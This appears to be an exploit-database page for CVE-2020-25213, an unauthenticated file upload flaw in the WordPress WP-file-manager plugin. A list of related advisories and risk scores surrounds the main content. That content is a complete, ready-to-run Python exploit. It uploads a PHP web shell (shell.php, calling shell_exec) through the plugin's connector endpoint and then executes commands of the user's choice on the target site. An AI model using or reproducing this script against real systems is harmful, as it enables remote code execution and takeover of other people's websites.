WordPress WP-file-manager v6.9 Plugin - Unauthenticated Arbitrary File Upload Exploit

🗓️ 03 Apr 2023 00:00:00Reported by BLYType

zdt🔗 0day.today👁 400 Views

WordPress WP-file-manager v6.9 Plugin Unauthenticated Arbitrary File Upload leading to RC

Reporter	Title	Published	Views	Family All 34
0day.today	WordPress File Manager 6.8 Remote Code Execution Exploit	10 Nov 202000:00	–	zdt
GithubExploit	Exploit for Unrestricted Upload of File with Dangerous Type in Webdesi9 File_Manager	25 Aug 202022:07	–	githubexploit
GithubExploit	Exploit for Unrestricted Upload of File with Dangerous Type in Webdesi9 File_Manager	22 Jan 202316:54	–	githubexploit
GithubExploit	Exploit for Unrestricted Upload of File with Dangerous Type in Filemanagerpro File_Manager	10 May 202612:07	–	githubexploit
ATTACKERKB	CVE-2020-25213	9 Sep 202000:00	–	attackerkb
BDU FSTEC	The vulnerability of the File Manager plugin (wp-file-manager) of the WordPress content management system allows a hacker to execute arbitrary PHP code on the target system.	24 Aug 202100:00	–	bdu_fstec
Circl	CVE-2020-25213	17 Oct 202020:40	–	circl
CISA KEV Catalog	WordPress File Manager Plugin Remote Code Execution Vulnerability	3 Nov 202100:00	–	cisa_kev
CNVD	WordPress wp-file-manager Arbitrary File Upload Vulnerability	14 Sep 202000:00	–	cnvd
Check Point Advisories	WordPress File Manager Plugin Remote Code Execution (CVE-2020-25213)	29 Sep 202000:00	–	checkpoint_advisories

#!/usr/bin/env

# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE
# Date: [ 22-01-2023 ]
# Exploit Author: [BLY]
# Vendor Homepage: [https://wpscan.com/vulnerability/10389]
# Version: [ File Manager plugin 6.0-6.9]
# Tested on: [ Debian ]
# CVE : [ CVE-2020-25213 ]

import sys,signal,time,requests
from bs4 import BeautifulSoup
#from pprint import pprint

def handler(sig,frame):
	print ("[!]Saliendo")
	sys.exit(1)

signal.signal(signal.SIGINT,handler)

def commandexec(command):

	exec_url = url+"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"
	params = {
		"cmd":command
	}

	r=requests.get(exec_url,params=params)

	soup = BeautifulSoup(r.text, 'html.parser')
	text = soup.get_text()

	print (text)
def exploit():

	global url

	url = sys.argv[1]
	command = sys.argv[2]
	upload_url = url+"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"

	headers = {
			'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",
			'Connection': "close" 
	}

	payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"

	try:
		r=requests.post(upload_url,data=payload,headers=headers)
		#pprint(r.json())
		commandexec(command)
	except:
		print("[!] Algo ha salido mal...")




def help():

	print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"")
	print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id")




if __name__ == '__main__':

	if len(sys.argv) != 3:
		help()

	else:
		exploit()

03 Apr 2023 00:00Current

9.4High risk

Vulners AI Score9.4

CVSS 27.5

CVSS 3.19.8 - 10

EPSS0.94411